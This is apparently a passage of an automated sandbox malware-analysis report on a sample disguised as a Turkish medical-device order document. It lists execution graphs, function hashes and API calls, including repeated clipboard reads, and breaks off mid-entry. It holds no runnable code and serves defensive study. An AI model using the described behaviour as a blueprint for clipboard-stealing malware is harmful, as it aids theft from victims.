                                                                                                    execution_graph 33409 674b350 33411 674b3b5 33409->33411 33412 674b402 33411->33412 33413 674af3c 33411->33413 33414 674c0a0 DispatchMessageW 33413->33414 33416 674c10c 33414->33416 33416->33411 33417 674a9b0 33418 674acb8 33417->33418 33419 674a9d8 33417->33419 33420 674a9e1 33419->33420 33423 6749eec 33419->33423 33422 674aa04 33424 6749ef7 33423->33424 33425 674acfb 33424->33425 33427 6749f08 33424->33427 33425->33422 33428 674ad30 OleInitialize 33427->33428 33429 674ad94 33428->33429 33429->33425 33430 674c132 33431 674c144 33430->33431 33432 674c14d 33430->33432 33435 c9d01f 33431->33435 33439 c9d005 33431->33439 33437 c9d048 33435->33437 33436 c9d066 33436->33432 33437->33436 33443 674c590 33437->33443 33440 c9d01f 33439->33440 33441 c9d066 33440->33441 33442 674c590 OleGetClipboard 33440->33442 33441->33432 33442->33440 33444 674c5a6 33443->33444 33445 674c5a0 33443->33445 33444->33437 33448 674c9d0 33445->33448 33456 674c9c0 33445->33456 33449 674c9d8 33448->33449 33450 674c9ec 33449->33450 33452 674c9c0 OleGetClipboard 33449->33452 33477 674ca08 33449->33477 33489 674ca18 33449->33489 33501 674c9ad 33449->33501 33450->33444 33451 674ca01 33451->33444 33452->33451 33457 674c915 33456->33457 33458 674c9ce 33456->33458 33459 674ca43 33458->33459 33462 674c9d0 33458->33462 33461 674ca45 33459->33461 33464 674ca89 33459->33464 33460 674c9ec 33460->33444 33473 674c9c0 OleGetClipboard 33461->33473 33474 674c9ad OleGetClipboard 33461->33474 33475 674ca18 OleGetClipboard 33461->33475 33476 674ca08 OleGetClipboard 33461->33476 33462->33460 33469 674c9c0 OleGetClipboard 33462->33469 33470 674c9ad OleGetClipboard 33462->33470 33471 674ca18 OleGetClipboard 33462->33471 33472 674ca08 OleGetClipboard 33462->33472 33463 674ca01 33463->33444 33466 674ca4b 33464->33466 33467 674cbf0 OleGetClipboard 33464->33467 33468 674cbe0 OleGetClipboard 33464->33468 33465 674cb27 33465->33444 33466->33444 33467->33465 33468->33465 33469->33463 33470->33463 33471->33463 33472->33463 33473->33466 33474->33466 33475->33466 33476->33466 33478 674ca1c 33477->33478 33479 674ca45 33478->33479 33480 674ca89 33478->33480 33483 674c9c0 OleGetClipboard 33479->33483 33484 674c9ad OleGetClipboard 33479->33484 33485 674ca18 OleGetClipboard 33479->33485 33486 674ca08 OleGetClipboard 33479->33486 33482 674ca4b 33480->33482 33513 674cbe0 33480->33513 33517 674cbf0 33480->33517 33481 674cb27 33481->33451 33482->33451 33483->33482 33484->33482 33485->33482 33486->33482 33490 674ca1c 33489->33490 33491 674ca45 33490->33491 33492 674ca89 33490->33492 33495 674c9c0 OleGetClipboard 33491->33495 33496 674c9ad OleGetClipboard 33491->33496 33497 674ca18 OleGetClipboard 33491->33497 33498 674ca08 OleGetClipboard 33491->33498 33494 674ca4b 33492->33494 33499 674cbf0 OleGetClipboard 33492->33499 33500 674cbe0 OleGetClipboard 33492->33500 33493 674cb27 33493->33451 33494->33451 33495->33494 33496->33494 33497->33494 33498->33494 33499->33493 33500->33493 33502 674c9b0 33501->33502 33503 674ca45 33502->33503 33504 674ca89 33502->33504 33507 674c9c0 OleGetClipboard 33503->33507 33508 674c9ad OleGetClipboard 33503->33508 33509 674ca18 OleGetClipboard 33503->33509 33510 674ca08 OleGetClipboard 33503->33510 33506 674ca4b 33504->33506 33511 674cbf0 OleGetClipboard 33504->33511 33512 674cbe0 OleGetClipboard 33504->33512 33505 674cb27 33505->33451 33506->33451 33507->33506 33508->33506 33509->33506 33510->33506 33511->33505 33512->33505 33515 674cbf0 33513->33515 33516 674cc2b 33515->33516 33521 674c7ac 33515->33521 33516->33481 33519 674cc05 33517->33519 33518 674c7ac OleGetClipboard 33518->33519 33519->33518 33520 674cc2b 33519->33520 33520->33481 33522 674cc98 OleGetClipboard 33521->33522 33524 674cd32 33522->33524 33525 6579c70 33526 6579c9d 33525->33526 33528 657bb7f 33526->33528 33530 6579fa6 33526->33530 33531 6579328 33526->33531 33529 6579328 LdrInitializeThunk 33529->33530 33530->33528 33530->33529 33532 657933a 33531->33532 33534 657933f 33531->33534 33532->33530 33533 6579a69 LdrInitializeThunk 33533->33532 33534->33532 33534->33533 33535 284e018 33536 284e024 33535->33536 33546 657295a 33536->33546 33553 6572968 33536->33553 33537 284e0c3 33559 657de00 33537->33559 33563 657ddff 33537->33563 33538 284e0e6 33567 657fc68 33538->33567 33571 657fc5e 33538->33571 33539 284e61f 33547 6572928 33546->33547 33548 6572962 33546->33548 33549 6572a56 33548->33549 33552 6579328 LdrInitializeThunk 33548->33552 33575 6579548 33548->33575 33581 657992c 33548->33581 33549->33537 33552->33549 33554 657298a 33553->33554 33555 6572a56 33554->33555 33556 657992c 2 API calls 33554->33556 33557 6579548 2 API calls 33554->33557 33558 6579328 LdrInitializeThunk 33554->33558 33555->33537 33556->33555 33557->33555 33558->33555 33560 657de22 33559->33560 33561 6579548 2 API calls 33560->33561 33562 657deec 33560->33562 33561->33562 33562->33538 33564 657de22 33563->33564 33565 6579548 2 API calls 33564->33565 33566 657deec 33564->33566 33565->33566 33566->33538 33568 657fc8a 33567->33568 33569 6579548 2 API calls 33568->33569 33570 657fd3a 33568->33570 33569->33570 33570->33539 33572 657fc8a 33571->33572 33573 6579548 2 API calls 33572->33573 33574 657fd3a 33572->33574 33573->33574 33574->33539 33579 6579579 33575->33579 33576 65796d9 33576->33549 33577 6579924 LdrInitializeThunk 33577->33576 33579->33576 33579->33577 33580 6579328 LdrInitializeThunk 33579->33580 33580->33579 33585 65797e3 33581->33585 33582 6579924 LdrInitializeThunk 33584 6579a81 33582->33584 33584->33549 33585->33582 33586 6579328 LdrInitializeThunk 33585->33586 33586->33585

                                                                                                    Executed Functions

                                                                                                    Function 06579548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 974 6579548-6579577 975 657957e-6579614 974->975 976 6579579 974->976 978 65796b3-65796b9 975->978 976->975 979 65796bf-65796d7 978->979 980 6579619-657962c 978->980 981 65796eb-65796fe 979->981 982 65796d9-65796e6 979->982 983 6579633-6579684 980->983 984 657962e 980->984 986 6579705-6579721 981->986 987 6579700 981->987 985 6579a81-6579b7e 982->985 1000 6579697-65796a9 983->1000 1001 6579686-6579694 983->1001 984->983 992 6579b86-6579b90 985->992 993 6579b80-6579b85 985->993 989 6579723 986->989 990 6579728-657974c 986->990 987->986 989->990 996 6579753-6579785 990->996 997 657974e 990->997 993->992 1006 6579787 996->1006 1007 657978c-65797ce 996->1007 997->996 1003 65796b0 1000->1003 1004 65796ab 1000->1004 1001->979 1003->978 1004->1003 1006->1007 1009 65797d5-65797de 1007->1009 1010 65797d0 1007->1010 1011 6579a06-6579a0c 1009->1011 1010->1009 1012 65797e3-6579808 1011->1012 1013 6579a12-6579a25 1011->1013 1014 657980f-6579846 1012->1014 1015 657980a 1012->1015 1016 6579a27 1013->1016 1017 6579a2c-6579a47 1013->1017 1025 657984d-657987f 1014->1025 1026 6579848 1014->1026 1015->1014 1016->1017 1018 6579a4e-6579a62 1017->1018 1019 6579a49 1017->1019 1023 6579a64 1018->1023 1024 6579a69-6579a7f LdrInitializeThunk 1018->1024 1019->1018 1023->1024 1024->985 1028 65798e3-65798f6 1025->1028 1029 6579881-65798a6 1025->1029 1026->1025 1032 65798fd-6579922 1028->1032 1033 65798f8 1028->1033 1030 65798ad-65798db 1029->1030 1031 65798a8 1029->1031 1030->1028 1031->1030 1036 6579924-6579925 1032->1036 1037 6579931-6579969 1032->1037 1033->1032 1036->1013 1038 6579970-65799d1 call 6579328 1037->1038 1039 657996b 1037->1039 1045 65799d3 1038->1045 1046 65799d8-65799fc 1038->1046 1039->1038 1045->1046 1049 6579a03 1046->1049 1050 65799fe 1046->1050 1049->1011 1050->1049
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4689247062.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_6570000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 33a599c4cf3774eee6801162234710e143e54e66c7d1db2c8afa32e25a5923f7
                                                                                                    • Instruction ID: 01974c41deef4b65390016349cb398d71a5363761cf3261fa0f6d07e69752ed9
                                                                                                    • Opcode Fuzzy Hash: 33a599c4cf3774eee6801162234710e143e54e66c7d1db2c8afa32e25a5923f7
                                                                                                    • Instruction Fuzzy Hash: 20F10874E01218CFDB54DFA9D884B9DFBB2BF88304F1482A9D808AB355DB759986CF50
                                                                                                    Function 02849DE0 Relevance: 1.1, Instructions: 1128COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 76a8806923c4c87fd01e50a238ee7f77bd350d657109c2b49c8b2969d6f5ff29
                                                                                                    • Instruction ID: a6c61c13aa22bd96193046137665481c69c209f6acc78a7a2d7142915dadb40b
                                                                                                    • Opcode Fuzzy Hash: 76a8806923c4c87fd01e50a238ee7f77bd350d657109c2b49c8b2969d6f5ff29
                                                                                                    • Instruction Fuzzy Hash: 78A28D78A40209CFCB19CFA8C594AAEBBB2FF88304F15855AE409DB365DB35ED51CB50
                                                                                                    Function 028469A0 Relevance: .5, Instructions: 513COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ff3881994669ff26d34393e8dc319cb80374f08d56ee0ab8224dc807d3d1e734
                                                                                                    • Instruction ID: a1a2b274bcad2159321f40c69b64ff4af3817841e1d1a913cb4a34288f8b07a6
                                                                                                    • Opcode Fuzzy Hash: ff3881994669ff26d34393e8dc319cb80374f08d56ee0ab8224dc807d3d1e734
                                                                                                    • Instruction Fuzzy Hash: F7125C78A002199FDB18DF65C854BAEBBB6FF89304F148529E409EB391EF359D41CB90
                                                                                                    Function 02846FC8 Relevance: .5, Instructions: 469COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fb7c2d35e4833828d76cd2c7ec401d42e6208eae141a4b679926358861ddf30c
                                                                                                    • Instruction ID: 8407fd956a76f22e3c7a5059d88e6bb5de4f2f49733b4a474d6b36e03ee7cfe6
                                                                                                    • Opcode Fuzzy Hash: fb7c2d35e4833828d76cd2c7ec401d42e6208eae141a4b679926358861ddf30c
                                                                                                    • Instruction Fuzzy Hash: 36125E78A00259DFCB15CF68C984AADFBB2FF88304F55806AE815EB265DB34ED41CB50
                                                                                                    Function 028429EC Relevance: .4, Instructions: 378COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 78ef9534429041a67a20b34ed09ad7a38dae1888b2765111124b81121b4dbf6f
                                                                                                    • Instruction ID: d00705bc85008ba6e7aace5a11675cac30275682b5d570636a966d7ffa5cc21d
                                                                                                    • Opcode Fuzzy Hash: 78ef9534429041a67a20b34ed09ad7a38dae1888b2765111124b81121b4dbf6f
                                                                                                    • Instruction Fuzzy Hash: 51D1A3399093DE8BDB278F7855503A9BFF1AF4B208F1845DACD94DB283DB248589C741
                                                                                                    Function 02843E09 Relevance: .3, Instructions: 263COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 651fe3a794178d04b5325815089e03f36f300c22df3164f4bcb40359751c38ca
                                                                                                    • Instruction ID: 4192d97d0eda1514bd1b571d140fb0d9e8f0671be2f47e0f528e4f37d77a7259
                                                                                                    • Opcode Fuzzy Hash: 651fe3a794178d04b5325815089e03f36f300c22df3164f4bcb40359751c38ca
                                                                                                    • Instruction Fuzzy Hash: 81919F79B0421DDBEB5CABB8985437E7BA3BFC8700B15866ED506E7384CE359C128781
                                                                                                    Function 0284C73F Relevance: .2, Instructions: 182COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 34bff053959018f6cc59061985a0fed6302b55e145758fd3ec3ad68e690a8bf9
                                                                                                    • Instruction ID: 8651ec06b646f8308371cd0be8e7dcc7b4c5dd502d0968a1b7bb67554d05cb59
                                                                                                    • Opcode Fuzzy Hash: 34bff053959018f6cc59061985a0fed6302b55e145758fd3ec3ad68e690a8bf9
                                                                                                    • Instruction Fuzzy Hash: 2B81A078E01218DFDB18DFAAD984B9DBBF2BF88300F14816AD419AB365DB709945CF50
                                                                                                    Function 0284D284 Relevance: .2, Instructions: 180COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 201ed04056551549b3be742ec7d2076979305f165fe53e60bb9105a4ecde367a
                                                                                                    • Instruction ID: 9c4e762cc5ffc760725ee7d96910657c8b8b13e0f6d858baec54713ccd449822
                                                                                                    • Opcode Fuzzy Hash: 201ed04056551549b3be742ec7d2076979305f165fe53e60bb9105a4ecde367a
                                                                                                    • Instruction Fuzzy Hash: EA819078E00218CFDB18DFAAD884B9DBBB2BF88304F14C169D409AB265DB749945CF50
                                                                                                    Function 0284C1A7 Relevance: .2, Instructions: 180COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8f0821ba31ebba3434ca72b955e1b316aa8ee0cc0646f64fab5a87c3a8aa7594
                                                                                                    • Instruction ID: c582eb0df6439b3ee14e59cfbf1191a736d7a395be6d01a92ffd009a0866b7c5
                                                                                                    • Opcode Fuzzy Hash: 8f0821ba31ebba3434ca72b955e1b316aa8ee0cc0646f64fab5a87c3a8aa7594
                                                                                                    • Instruction Fuzzy Hash: 78819278E01218CFDB14DFAAD984B9DBBF2BF88304F14816AE409AB365DB749941CF50
                                                                                                    Function 0284C477 Relevance: .2, Instructions: 180COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a455fe619ff42a361fb5e2ff1acb86dcf0e63cfd65ff2967ab357b230954870f
                                                                                                    • Instruction ID: 92a7a80546a9bd48a3677ea9f2821f2a876a9fbe698469fd769f2fdcaf2be8c5
                                                                                                    • Opcode Fuzzy Hash: a455fe619ff42a361fb5e2ff1acb86dcf0e63cfd65ff2967ab357b230954870f
                                                                                                    • Instruction Fuzzy Hash: A5819078E01218CFDB18DFAAD884B9DBBF2BF88304F14D16AD419AB265DB749941CF50
                                                                                                    Function 0284CFB7 Relevance: .2, Instructions: 180COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 20e9990be8d53c78c5fd5e9516eb309fff7cd5e06115802dd1ab19881b52d39e
                                                                                                    • Instruction ID: 9a8d3f1b75314e2a6af0e34bf8c8107820e10b9777b4752a1b5148ca1d385878
                                                                                                    • Opcode Fuzzy Hash: 20e9990be8d53c78c5fd5e9516eb309fff7cd5e06115802dd1ab19881b52d39e
                                                                                                    • Instruction Fuzzy Hash: 0E819278E00258CFDB14DFAAD984B9DBBF2BF88300F149169D819AB365DB709945CF50
                                                                                                    Function 0284CCE7 Relevance: .2, Instructions: 180COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c3b0cca62c2b225d4d00e16bf02325c7cf6070132c967f3f9fb714514c8a93b1
                                                                                                    • Instruction ID: ae75cf2deb64e4cad99475b3f4d02bf1841213e5fc7d25adbf5a63ab02a236c0
                                                                                                    • Opcode Fuzzy Hash: c3b0cca62c2b225d4d00e16bf02325c7cf6070132c967f3f9fb714514c8a93b1
                                                                                                    • Instruction Fuzzy Hash: 91819278E01218CFDB14DFAAD884B9DBBF2BF88304F14816AD419AB365DB749945CF50
                                                                                                    Function 0284E988 Relevance: .1, Instructions: 147COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 092fe6a06b70940ddc6477037ff957a01eea9747f66726a19ec1326aa5498844
                                                                                                    • Instruction ID: 05c029a0c17b9a02f530ddc00d101fc01902c8bb286f7b8109e8af91c1ed3e3c
                                                                                                    • Opcode Fuzzy Hash: 092fe6a06b70940ddc6477037ff957a01eea9747f66726a19ec1326aa5498844
                                                                                                    • Instruction Fuzzy Hash: 6F51A878E00208DFDB18DFBAD484A9DBBB2FF89300F249129E915AB365DB745941CF54
                                                                                                    Function 02845381 Relevance: .1, Instructions: 146COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c52475520eb2a1a83f904b74c96a6f3971f9e2083b92679b26843ede623f292a
                                                                                                    • Instruction ID: 5db5aa3d3d9fab0b79ccdb5554cb3b8e486c2031ea82d3d11c1b94242cf9f790
                                                                                                    • Opcode Fuzzy Hash: c52475520eb2a1a83f904b74c96a6f3971f9e2083b92679b26843ede623f292a
                                                                                                    • Instruction Fuzzy Hash: 1161B478E00618CFDB18DFAAD944A9DBBF2BF88300F54C169D818AB365DB749941CF40
                                                                                                    Function 0284CA19 Relevance: .1, Instructions: 146COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 58a6f63375fcc2ef92c2cd03b49fea735e03e0719a7cb6f6211e9704a9e8274f
                                                                                                    • Instruction ID: 6424d7db9fc872d67d68d5ab4b8fded775708d1de8f11474379d5d9d1a6321e0
                                                                                                    • Opcode Fuzzy Hash: 58a6f63375fcc2ef92c2cd03b49fea735e03e0719a7cb6f6211e9704a9e8274f
                                                                                                    • Instruction Fuzzy Hash: E151C478E0160C8FEB18DFAAD944A9DBBF2BF88300F14D16AD418AB365DB749941CF50
                                                                                                    Function 0284E987 Relevance: .1, Instructions: 143COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7b97496635dcb8e90194af8cd05affc59533184b1d6c1bf9f959d13b70a51004
                                                                                                    • Instruction ID: 26b2381c1a70887532f1e1b6262502c6923a184c1cf97e6ba5fc3a27967bc194
                                                                                                    • Opcode Fuzzy Hash: 7b97496635dcb8e90194af8cd05affc59533184b1d6c1bf9f959d13b70a51004
                                                                                                    • Instruction Fuzzy Hash: 35519878E00208DFDB18DFBAD494A9DBBB2FF89300F24912AE815AB365DB745941CF14
                                                                                                    Function 0674C098 Relevance: 1.6, APIs: 1, Instructions: 82windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1051 674c098-674c09c 1052 674c022-674c062 1051->1052 1053 674c09e 1051->1053 1059 674c064-674c06a 1052->1059 1060 674c06b-674c08c 1052->1060 1054 674c0a6-674c10a DispatchMessageW 1053->1054 1055 674c0a0-674c0a5 1053->1055 1056 674c113-674c127 1054->1056 1057 674c10c-674c112 1054->1057 1055->1054 1057->1056 1059->1060
                                                                                                    APIs
                                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0674B677), ref: 0674C0FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4690185493.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_6740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatchMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 2061451462-0
                                                                                                    • Opcode ID: 23e5bd72cfa2bac4a276cf68497a999b15e695a6c79cccca32e4c37ca47a54b0
                                                                                                    • Instruction ID: bc5a5c5705b4f8a20c8d637031c7be6760a937b4412e9912dd34ddc4f8cf5359
                                                                                                    • Opcode Fuzzy Hash: 23e5bd72cfa2bac4a276cf68497a999b15e695a6c79cccca32e4c37ca47a54b0
                                                                                                    • Instruction Fuzzy Hash: 493143B1C047498FDB20DF9AE848BDEBBF4AB48324F10846AD558A3251D379A544CFA5
                                                                                                    Function 0674CC8E Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1063 674cc8e-674cce8 1064 674ccf2-674cd30 OleGetClipboard 1063->1064 1065 674cd32-674cd38 1064->1065 1066 674cd39-674cd87 1064->1066 1065->1066 1071 674cd97 1066->1071 1072 674cd89-674cd8d 1066->1072 1074 674cd98 1071->1074 1072->1071 1073 674cd8f 1072->1073 1073->1071 1074->1074
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4690185493.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_6740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 220874293-0
                                                                                                    • Opcode ID: ee4fe9321caa267c572480a96201dacd0dc4621c8684d09ff361b6a0e9600e5c
                                                                                                    • Instruction ID: 6118973ef6fb7ca16180e09ca3febb08acd8e397f02cf592e2645ec5a4013816
                                                                                                    • Opcode Fuzzy Hash: ee4fe9321caa267c572480a96201dacd0dc4621c8684d09ff361b6a0e9600e5c
                                                                                                    • Instruction Fuzzy Hash: F13110B4D02208DFDB10DF99D988BDEBFB5AF48704F248019E508AB290DBB49945CFA1
                                                                                                    Function 0674C7AC Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1075 674c7ac-674cd30 OleGetClipboard 1078 674cd32-674cd38 1075->1078 1079 674cd39-674cd87 1075->1079 1078->1079 1084 674cd97 1079->1084 1085 674cd89-674cd8d 1079->1085 1087 674cd98 1084->1087 1085->1084 1086 674cd8f 1085->1086 1086->1084 1087->1087
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4690185493.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_6740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 220874293-0
                                                                                                    • Opcode ID: 743ae24824eedc62568ef5d919530f9e1f9b46dc0cc2c9afc1a873293d44ea88
